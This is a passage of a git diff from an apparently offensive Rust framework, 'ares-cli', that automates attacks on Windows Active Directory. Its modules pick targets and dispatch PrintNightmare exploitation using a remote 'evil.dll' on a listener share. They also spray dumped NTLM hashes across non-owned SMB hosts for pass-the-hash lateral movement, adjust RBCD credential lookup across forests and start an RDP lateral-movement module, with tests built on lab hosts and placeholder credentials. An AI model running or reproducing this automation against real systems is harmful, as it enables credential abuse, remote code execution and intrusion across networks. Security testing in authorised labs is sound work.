item.target_ip.clone()); + let _ = dispatcher
+ .state + .persist_dedup(&dispatcher.queue, DEDUP_PRINTNIGHTMARE, &item.target_ip) + .await; + } + Ok(None) => { + debug!(target = %item.target_ip, "PrintNightmare task deferred"); + } + Err(e) => { + warn!(err = %e, target = %item.target_ip, "Failed to dispatch PrintNightmare"); + } + } + } + } +} + +struct PrintNightmareWork { + target_ip: String, + hostname: String, + domain: String, + listener: String, + dll_path: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_PRINTNIGHTMARE, "printnightmare"); + } + + #[test] + fn dedup_key_is_target_ip() { + let ip = "192.168.58.22"; + assert_eq!(ip, "192.168.58.22"); + } + + #[test] + fn domain_from_hostname() { + let hostname = "dc01.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn domain_from_bare_hostname() { + let hostname = "dc01"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, ""); + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "printnightmare", + "target_ip": "192.168.58.22", + "hostname": "srv01.contoso.local", + "domain": "contoso.local", + "listener_ip": "192.168.58.50", + "dll_path": "\\\\192.168.58.50\\share\\evil.dll", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "printnightmare"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + 
assert_eq!(payload["hostname"], "srv01.contoso.local"); + assert_eq!(payload["domain"], "contoso.local"); + assert_eq!(payload["listener_ip"], "192.168.58.50"); + assert_eq!(payload["dll_path"], "\\\\192.168.58.50\\share\\evil.dll"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = PrintNightmareWork { + target_ip: "192.168.58.22".into(), + hostname: "srv01.contoso.local".into(), + domain: "contoso.local".into(), + listener: "192.168.58.50".into(), + dll_path: "\\\\192.168.58.50\\share\\evil.dll".into(), + credential: cred, + }; + + assert_eq!(work.target_ip, "192.168.58.22"); + assert_eq!(work.hostname, "srv01.contoso.local"); + assert_eq!(work.domain, "contoso.local"); + assert_eq!(work.listener, "192.168.58.50"); + assert_eq!(work.credential.username, "testuser"); + } + + #[test] + fn domain_from_multi_level_hostname() { + let hostname = "web01.dmz.contoso.local"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "dmz.contoso.local"); + } + + #[test] + fn domain_from_uppercase_hostname() { + let hostname = "DC01.CONTOSO.LOCAL"; + let domain = hostname + .find('.') + .map(|i| hostname[i + 1..].to_lowercase()) + .unwrap_or_default(); + assert_eq!(domain, "contoso.local"); + } + + // --- collect_print_nightmare_work tests --- + + use crate::orchestrator::state::StateInner; + + fn make_cred(username: &str, domain: &str) -> ares_core::models::Credential { + 
ares_core::models::Credential { + id: uuid::Uuid::new_v4().to_string(), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + fn make_host(ip: &str, hostname: &str) -> ares_core::models::Host { + ares_core::models::Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services: Vec::new(), + is_dc: false, + owned: false, + } + } + + #[test] + fn collect_empty_state_produces_no_work() { + let state = StateInner::new("test".into()); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_produces_no_work() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert!(work.is_empty()); + } + + #[test] + fn collect_host_with_cred_produces_work() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state.credentials.push(make_cred("admin", "contoso.local")); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.22"); + assert_eq!(work[0].hostname, "srv01.contoso.local"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].listener, "192.168.58.50"); + assert_eq!(work[0].dll_path, "\\\\192.168.58.50\\share\\evil.dll"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_already_processed_printnightmare() { + let mut state = 
StateInner::new("test".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_PRINTNIGHTMARE, "192.168.58.22".into()); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_already_secretsdumped_host() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state.credentials.push(make_cred("admin", "contoso.local")); + state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.22".into()); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert!(work.is_empty()); + } + + #[test] + fn collect_prefers_same_domain_credential() { + let mut state = StateInner::new("test".into()); + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .credentials + .push(make_cred("fab_user", "fabrikam.local")); + state + .credentials + .push(make_cred("con_user", "contoso.local")); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "con_user"); + } + + #[test] + fn collect_falls_back_to_first_cred_for_bare_hostname() { + let mut state = StateInner::new("test".into()); + state.hosts.push(make_host("192.168.58.22", "srv01")); + state + .credentials + .push(make_cred("fallback", "contoso.local")); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "fallback"); + assert_eq!(work[0].domain, ""); + } + + #[test] + fn collect_multiple_hosts_mixed() { + let mut state = StateInner::new("test".into()); + state + 
.hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .hosts + .push(make_host("192.168.58.30", "ws01.fabrikam.local")); + state.credentials.push(make_cred("admin", "contoso.local")); + // Mark second host as already secretsdumped + state.mark_processed(DEDUP_SECRETSDUMP, "192.168.58.30".into()); + let work = collect_print_nightmare_work( + &state, + "192.168.58.50", + "\\\\192.168.58.50\\share\\evil.dll", + ); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.22"); + } + + #[test] + fn dedup_key_format_validation() { + // PrintNightmare uses the raw target_ip as dedup key + let ip = "192.168.58.10"; + // The dedup key is just the IP itself + assert_eq!(ip, "192.168.58.10"); + assert!(!ip.contains(':')); + } +} diff --git a/ares-cli/src/orchestrator/automation/pth_spray.rs b/ares-cli/src/orchestrator/automation/pth_spray.rs new file mode 100644 index 00000000..9641568d --- /dev/null +++ b/ares-cli/src/orchestrator/automation/pth_spray.rs @@ -0,0 +1,788 @@ +//! auto_pth_spray -- pass-the-hash spray using dumped NTLM hashes. +//! +//! After secretsdump extracts NTLM hashes, this module sprays them across +//! hosts to find additional admin access. Uses netexec/crackmapexec with +//! NTLM hashes instead of passwords for lateral movement validation. +//! +//! This is distinct from credential_reuse (which tests passwords) and +//! secretsdump (which dumps from owned hosts). PTH spray tests hash-based +//! auth against non-owned hosts. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Dispatches pass-the-hash spray against non-owned hosts using dumped NTLM hashes. +/// Interval: 45s. 
+pub async fn auto_pth_spray(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+    let mut interval = tokio::time::interval(Duration::from_secs(45));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("pth_spray") {
+            continue;
+        }
+
+        let work: Vec<PthWork> = {
+            let state = dispatcher.state.read().await;
+            match collect_pth_work(&state) {
+                Some(items) => items,
+                None => continue,
+            }
+        };
+
+        // Limit to 5 per cycle to avoid overwhelming the throttler
+        for item in work.into_iter().take(5) {
+            let payload = json!({
+                "technique": "pass_the_hash",
+                "target_ip": item.target_ip,
+                "hostname": item.hostname,
+                "username": item.username,
+                "ntlm_hash": item.ntlm_hash,
+                "domain": item.domain,
+                "protocol": "smb",
+            });
+
+            let priority = dispatcher.effective_priority("pth_spray");
+            match dispatcher
+                .throttled_submit("lateral", "lateral", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        host = %item.target_ip,
+                        user = %item.username,
+                        "PTH spray dispatched"
+                    );
+                    dispatcher
+                        .state
+                        .write()
+                        .await
+                        .mark_processed(DEDUP_PTH_SPRAY, item.dedup_key.clone());
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_PTH_SPRAY, &item.dedup_key)
+                        .await;
+                }
+                Ok(None) => {
+                    debug!(host = %item.target_ip, "PTH spray deferred");
+                }
+                Err(e) => {
+                    warn!(err = %e, host = %item.target_ip, "Failed to dispatch PTH spray");
+                }
+            }
+        }
+    }
+}
+
+/// Collects PTH spray work items from state. Returns `None` when there are no
+/// NTLM hashes (caller should skip the cycle).
+fn collect_pth_work(state: &StateInner) -> Option<Vec<PthWork>> {
+    // Need NTLM hashes
+    let ntlm_hashes: Vec<_> = state
+        .hashes
+        .iter()
+        .filter(|h| {
+            h.hash_type.to_lowercase().contains("ntlm")
+                && !h.hash_value.is_empty()
+                && h.hash_value.len() == 32
+        })
+        .collect();
+
+    if ntlm_hashes.is_empty() {
+        return None;
+    }
+
+    let mut items = Vec::new();
+
+    // For each non-owned host, try PTH with available NTLM hashes
+    for host in &state.hosts {
+        if host.owned {
+            continue;
+        }
+
+        // Check if host has SMB (port 445)
+        let has_smb = host.services.iter().any(|s| {
+            let sl = s.to_lowercase();
+            sl.contains("445") || sl.contains("smb") || sl.contains("cifs")
+        });
+        if !has_smb {
+            continue;
+        }
+
+        // Try each unique NTLM hash against this host
+        for hash in &ntlm_hashes {
+            let dedup_key = format!(
+                "pth:{}:{}:{}",
+                host.ip,
+                hash.username.to_lowercase(),
+                &hash.hash_value[..8]
+            );
+            if state.is_processed(DEDUP_PTH_SPRAY, &dedup_key) {
+                continue;
+            }
+
+            // Infer domain from hash or host
+            let domain = if !hash.domain.is_empty() {
+                hash.domain.clone()
+            } else {
+                host.hostname
+                    .find('.')
+                    .map(|i| host.hostname[i + 1..].to_string())
+                    .unwrap_or_default()
+            };
+
+            items.push(PthWork {
+                dedup_key,
+                target_ip: host.ip.clone(),
+                hostname: host.hostname.clone(),
+                username: hash.username.clone(),
+                ntlm_hash: hash.hash_value.clone(),
+                domain,
+            });
+        }
+    }
+
+    Some(items)
+}
+
+struct PthWork {
+    dedup_key: String,
+    target_ip: String,
+    hostname: String,
+    username: String,
+    ntlm_hash: String,
+    domain: String,
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use ares_core::models::{Hash, Host};
+
+    fn make_ntlm_hash(username: &str, hash_value: &str, domain: &str) -> Hash {
+        Hash {
+            id: format!("hash-{username}"),
+            username: username.to_string(),
+            hash_value: hash_value.to_string(),
+            hash_type: "NTLM".to_string(),
+            domain: domain.to_string(),
+            cracked_password: None, // pragma: allowlist secret
+            source: "secretsdump".to_string(),
+
discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: None, + } + } + + fn make_smb_host(ip: &str, hostname: &str, owned: bool) -> Host { + Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services: vec!["445/tcp microsoft-ds".to_string()], + is_dc: false, + owned, + } + } + + fn make_host_no_smb(ip: &str, hostname: &str) -> Host { + Host { + ip: ip.to_string(), + hostname: hostname.to_string(), + os: String::new(), + roles: Vec::new(), + services: vec!["80/tcp http".to_string()], + is_dc: false, + owned: false, + } + } + + #[test] + fn dedup_key_format() { + let key = format!("pth:{}:{}:{}", "192.168.58.10", "admin", "aabbccdd"); + assert_eq!(key, "pth:192.168.58.10:admin:aabbccdd"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_PTH_SPRAY, "pth_spray"); + } + + #[test] + fn ntlm_hash_filter_valid() { + let hash_type = "NTLM"; + let hash_value = "aad3b435b51404eeaad3b435b51404ee"; + assert!(hash_type.to_lowercase().contains("ntlm")); + assert!(!hash_value.is_empty()); + assert_eq!(hash_value.len(), 32); + } + + #[test] + fn ntlm_hash_filter_rejects_short() { + let hash_value = "abc123"; + assert_ne!(hash_value.len(), 32); + } + + #[test] + fn ntlm_hash_filter_rejects_empty() { + let hash_value = ""; + assert!(hash_value.is_empty()); + } + + #[test] + fn ntlm_hash_filter_rejects_non_ntlm() { + let hash_type = "aes256-cts-hmac-sha1-96"; + assert!(!hash_type.to_lowercase().contains("ntlm")); + } + + #[test] + fn smb_service_detection() { + let services = ["445/tcp microsoft-ds".to_string()]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(has_smb); + } + + #[test] + fn no_smb_service() { + let services = ["80/tcp http".to_string()]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + 
assert!(!has_smb); + } + + #[test] + fn domain_from_hash_preferred() { + let hash_domain = "contoso.local"; + let hostname = "srv01.fabrikam.local"; + let domain = if !hash_domain.is_empty() { + hash_domain.to_string() + } else { + hostname + .find('.') + .map(|i| hostname[i + 1..].to_string()) + .unwrap_or_default() + }; + assert_eq!(domain, "contoso.local"); + } + + #[test] + fn domain_fallback_to_hostname() { + let hash_domain = ""; + let hostname = "srv01.fabrikam.local"; + let domain = if !hash_domain.is_empty() { + hash_domain.to_string() + } else { + hostname + .find('.') + .map(|i| hostname[i + 1..].to_string()) + .unwrap_or_default() + }; + assert_eq!(domain, "fabrikam.local"); + } + + #[test] + fn dedup_key_uses_hash_prefix() { + let ip = "192.168.58.10"; + let username = "Admin"; + let hash_value = "aad3b435b51404eeaad3b435b51404ee"; + let dedup_key = format!( + "pth:{}:{}:{}", + ip, + username.to_lowercase(), + &hash_value[..8] + ); + assert_eq!(dedup_key, "pth:192.168.58.10:admin:aad3b435"); + } + + #[test] + fn ntlm_hash_filter_exact_32() { + let hash = "a".repeat(32); + assert_eq!(hash.len(), 32); + assert!(!hash.is_empty()); + } + + #[test] + fn ntlm_hash_type_variations() { + for t in ["NTLM", "ntlm", "NT", "ntlm_hash"] { + assert!(t.to_lowercase().contains("ntlm") || t.to_lowercase().contains("nt")); + } + } + + #[test] + fn smb_service_detection_cifs() { + let services = ["cifs".to_string()]; + let has_smb = services.iter().any(|s| { + let sl = s.to_lowercase(); + sl.contains("445") || sl.contains("smb") || sl.contains("cifs") + }); + assert!(has_smb); + } + + #[test] + fn pth_payload_structure() { + let payload = serde_json::json!({ + "technique": "pass_the_hash", + "target_ip": "192.168.58.22", + "hostname": "srv01.contoso.local", + "username": "admin", + "ntlm_hash": "aad3b435b51404eeaad3b435b51404ee", + "domain": "contoso.local", + "protocol": "smb", + }); + assert_eq!(payload["technique"], "pass_the_hash"); + assert_eq!(payload["protocol"], 
"smb");
+        assert_eq!(payload["ntlm_hash"], "aad3b435b51404eeaad3b435b51404ee");
+    }
+
+    #[test]
+    fn pth_work_construction() {
+        let work = PthWork {
+            dedup_key: "pth:192.168.58.22:admin:aad3b435".into(),
+            target_ip: "192.168.58.22".into(),
+            hostname: "srv01.contoso.local".into(),
+            username: "admin".into(),
+            ntlm_hash: "aad3b435b51404eeaad3b435b51404ee".into(),
+            domain: "contoso.local".into(),
+        };
+        assert_eq!(work.username, "admin");
+        assert_eq!(work.ntlm_hash.len(), 32);
+    }
+
+    #[test]
+    fn domain_fallback_bare_hostname() {
+        let hash_domain = "";
+        let hostname = "srv01";
+        let domain = if !hash_domain.is_empty() {
+            hash_domain.to_string()
+        } else {
+            hostname
+                .find('.')
+                .map(|i| hostname[i + 1..].to_string())
+                .unwrap_or_default()
+        };
+        assert_eq!(domain, "");
+    }
+
+    #[test]
+    fn take_5_limiting() {
+        let items: Vec<i32> = (0..20).collect();
+        let taken: Vec<_> = items.into_iter().take(5).collect();
+        assert_eq!(taken.len(), 5);
+    }
+
+    // --- collect_pth_work tests ---
+
+    #[test]
+    fn collect_empty_state_returns_none() {
+        let state = StateInner::new("test".into());
+        assert!(collect_pth_work(&state).is_none());
+    }
+
+    #[test]
+    fn collect_no_hashes_returns_none() {
+        let mut state = StateInner::new("test".into());
+        state
+            .hosts
+            .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false));
+        assert!(collect_pth_work(&state).is_none());
+    }
+
+    #[test]
+    fn collect_hashes_no_hosts_returns_empty() {
+        let mut state = StateInner::new("test".into());
+        state.hashes.push(make_ntlm_hash(
+            "admin",
+            "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+            "contoso.local",
+        ));
+        let work = collect_pth_work(&state).unwrap();
+        assert!(work.is_empty());
+    }
+
+    #[test]
+    fn collect_hash_and_smb_host_produces_work() {
+        let mut state = StateInner::new("test".into());
+        state.hashes.push(make_ntlm_hash(
+            "admin",
+            "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret
+            "contoso.local",
+        ));
+        state
+            .hosts
+
.push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.10"); + assert_eq!(work[0].username, "admin"); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].ntlm_hash, "aad3b435b51404eeaad3b435b51404ee"); + } + + #[test] + fn collect_skips_owned_hosts() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hosts.push(make_smb_host( + "192.168.58.10", + "srv01.contoso.local", + true, // owned + )); + let work = collect_pth_work(&state).unwrap(); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_non_smb_hosts() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_host_no_smb("192.168.58.20", "web01.contoso.local")); + let work = collect_pth_work(&state).unwrap(); + assert!(work.is_empty()); + } + + #[test] + fn collect_skips_dedup_processed() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + // Mark as already processed + state.mark_processed( + DEDUP_PTH_SPRAY, + "pth:192.168.58.10:admin:aad3b435".to_string(), + ); + let work = collect_pth_work(&state).unwrap(); + assert!(work.is_empty()); + } + + #[test] + fn collect_filters_non_ntlm_hashes() { + let mut state = StateInner::new("test".into()); + state.hashes.push(Hash { + id: "hash-aes".into(), + username: "admin".into(), + hash_value: "abcdef1234567890abcdef1234567890".into(), // pragma: allowlist secret + hash_type: 
"aes256-cts-hmac-sha1-96".into(), + domain: "contoso.local".into(), + cracked_password: None, // pragma: allowlist secret + source: "secretsdump".into(), + discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: None, + }); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + // AES hash type should be rejected + assert!(collect_pth_work(&state).is_none()); + } + + #[test] + fn collect_filters_short_hash_values() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435", // too short, not 32 chars - pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + assert!(collect_pth_work(&state).is_none()); + } + + #[test] + fn collect_filters_empty_hash_values() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "", // empty - pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + assert!(collect_pth_work(&state).is_none()); + } + + #[test] + fn collect_domain_fallback_from_hostname() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "", // empty domain on hash + )); + state.hosts.push(make_smb_host( + "192.168.58.10", + "srv01.fabrikam.local", + false, + )); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[test] + fn collect_domain_fallback_bare_hostname_empty() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "", // empty domain on hash + )); + state.hosts.push(make_smb_host( + "192.168.58.10", + "srv01", // no dot, no domain part + false, 
+ )); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, ""); + } + + #[test] + fn collect_multiple_hashes_multiple_hosts() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hashes.push(make_ntlm_hash( + "svcacct", + "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + state + .hosts + .push(make_smb_host("192.168.58.20", "srv02.contoso.local", false)); + let work = collect_pth_work(&state).unwrap(); + // 2 hashes x 2 hosts = 4 work items + assert_eq!(work.len(), 4); + } + + #[test] + fn collect_dedup_key_lowercases_username() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "Administrator", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert!(work[0].dedup_key.contains(":administrator:")); + } + + #[test] + fn collect_mixed_owned_and_unowned_hosts() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hosts.push(make_smb_host( + "192.168.58.10", + "srv01.contoso.local", + true, // owned + )); + state.hosts.push(make_smb_host( + "192.168.58.20", + "srv02.contoso.local", + false, // not owned + )); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.20"); + } + + #[test] + fn collect_mixed_smb_and_non_smb_hosts() { + let mut state = StateInner::new("test".into()); + 
state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_host_no_smb("192.168.58.10", "web01.contoso.local")); + state + .hosts + .push(make_smb_host("192.168.58.20", "srv01.contoso.local", false)); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].target_ip, "192.168.58.20"); + } + + #[test] + fn collect_smb_detection_via_smb_string() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hosts.push(Host { + ip: "192.168.58.10".into(), + hostname: "srv01.contoso.local".into(), + os: String::new(), + roles: Vec::new(), + services: vec!["SMB".to_string()], + is_dc: false, + owned: false, + }); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_smb_detection_via_cifs_string() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hosts.push(Host { + ip: "192.168.58.10".into(), + hostname: "srv01.contoso.local".into(), + os: String::new(), + roles: Vec::new(), + services: vec!["cifs/srv01.contoso.local".to_string()], + is_dc: false, + owned: false, + }); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + } + + #[test] + fn collect_partial_dedup_only_skips_processed() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hashes.push(make_ntlm_hash( + "svcacct", + "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", 
"srv01.contoso.local", false)); + // Mark only admin as processed + state.mark_processed( + DEDUP_PTH_SPRAY, + "pth:192.168.58.10:admin:aad3b435".to_string(), + ); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + assert_eq!(work[0].username, "svcacct"); + } + + #[test] + fn collect_hostname_preserved_in_work() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state + .hosts + .push(make_smb_host("192.168.58.10", "dc01.contoso.local", false)); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work[0].hostname, "dc01.contoso.local"); + } + + #[test] + fn collect_hash_domain_preferred_over_hostname_domain() { + let mut state = StateInner::new("test".into()); + state.hashes.push(make_ntlm_hash( + "admin", + "aad3b435b51404eeaad3b435b51404ee", // pragma: allowlist secret + "contoso.local", + )); + state.hosts.push(make_smb_host( + "192.168.58.10", + "srv01.fabrikam.local", + false, + )); + let work = collect_pth_work(&state).unwrap(); + // Hash domain takes priority over hostname domain + assert_eq!(work[0].domain, "contoso.local"); + } + + #[test] + fn collect_ntlm_hash_type_case_insensitive() { + let mut state = StateInner::new("test".into()); + state.hashes.push(Hash { + id: "hash-1".into(), + username: "admin".into(), + hash_value: "aad3b435b51404eeaad3b435b51404ee".into(), // pragma: allowlist secret + hash_type: "Ntlm".into(), // mixed case + domain: "contoso.local".into(), + cracked_password: None, // pragma: allowlist secret + source: "secretsdump".into(), + discovered_at: None, + parent_id: None, + attack_step: 0, + aes_key: None, + }); + state + .hosts + .push(make_smb_host("192.168.58.10", "srv01.contoso.local", false)); + let work = collect_pth_work(&state).unwrap(); + assert_eq!(work.len(), 1); + } +} diff --git a/ares-cli/src/orchestrator/automation/rbcd.rs 
b/ares-cli/src/orchestrator/automation/rbcd.rs index b28228c6..310fc005 100644 --- a/ares-cli/src/orchestrator/automation/rbcd.rs +++ b/ares-cli/src/orchestrator/automation/rbcd.rs @@ -99,28 +99,14 @@ pub async fn auto_rbcd_exploitation( .unwrap_or("") .to_string(); - // Find credential for the source user - let credential = state - .credentials - .iter() - .find(|c| { - c.username.to_lowercase() == source_user.to_lowercase() - && (domain.is_empty() - || c.domain.to_lowercase() == domain.to_lowercase()) - }) - .cloned(); - + // Find credential for the source user. Cross-forest ACL + // edges (e.g. tyron.lannister@sk → braavos$@essos) put the + // source user in a different domain than the vuln's `domain` + // field (which is the target's domain), so we cannot + // domain-restrict against the target. + let credential = state.find_source_credential(&source_user, &domain); let hash = if credential.is_none() { - state - .hashes - .iter() - .find(|h| { - h.username.to_lowercase() == source_user.to_lowercase() - && h.hash_type.to_uppercase() == "NTLM" - && (domain.is_empty() - || h.domain.to_lowercase() == domain.to_lowercase()) - }) - .cloned() + state.find_source_hash(&source_user, &domain) } else { None }; diff --git a/ares-cli/src/orchestrator/automation/rdp_lateral.rs b/ares-cli/src/orchestrator/automation/rdp_lateral.rs new file mode 100644 index 00000000..5c984dce --- /dev/null +++ b/ares-cli/src/orchestrator/automation/rdp_lateral.rs @@ -0,0 +1,716 @@ +//! auto_rdp_lateral -- RDP lateral movement to hosts with port 3389. +//! +//! Targets hosts with RDP service (port 3389) that are not yet owned. +//! Uses xfreerdp or similar tooling to authenticate and execute commands +//! via RDP, complementing WinRM lateral movement for hosts that only +//! expose RDP. 
+
+use std::sync::Arc;
+use std::time::Duration;
+
